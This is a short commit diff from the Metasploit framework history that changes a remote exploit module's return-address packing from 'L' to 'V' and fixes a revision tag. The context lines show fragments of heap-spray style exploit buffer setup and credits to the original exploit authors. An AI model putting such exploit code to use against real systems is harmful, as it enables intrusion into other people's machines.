swap L to V for packing
git-svn-id: file:///home/svn/framework3/trunk@7509 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
70cf288b99
commit
9381abf41a
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'shinnai <shinnai[at]autistici[dot]org>', # Original exploit [see References]
|
'shinnai <shinnai[at]autistici[dot]org>', # Original exploit [see References]
|
||||||
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
|
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
|
||||||
],
|
],
|
||||||
'Version' => '$Revision:$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'URL', 'http://www.milw0rm.com/exploits/9116' ],
|
[ 'URL', 'http://www.milw0rm.com/exploits/9116' ],
|
||||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Setup exploit buffers
|
# Setup exploit buffers
|
||||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
ret = Rex::Text.uri_encode([target.ret].pack('V'))
|
||||||
blocksize = 0x40000
|
blocksize = 0x40000
|
||||||
fillto = 500
|
fillto = 500
|
||||||
offset = target['Offset']
|
offset = target['Offset']
|
||||||
|
|
Loading…
Reference in New Issue